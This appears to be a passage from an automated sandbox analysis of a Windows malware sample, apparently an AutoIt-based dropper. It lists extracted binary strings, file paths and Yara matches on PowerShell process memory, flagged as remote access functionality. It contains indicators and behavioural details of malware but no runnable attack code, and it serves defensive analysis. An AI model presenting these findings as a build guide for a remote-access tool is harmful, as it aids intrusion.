Source: x.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Tr.exe Binary or memory string: WIN_XPe
Source: Tr.exe Binary or memory string: WIN_VISTA
Source: Tr.exe Binary or memory string: WIN_7
Source: Tr.exe Binary or memory string: WIN_8
Source: Tr.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B36399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_00B36399
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B3685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_00B3685D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00416399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 12_2_00416399
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0041685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_0041685D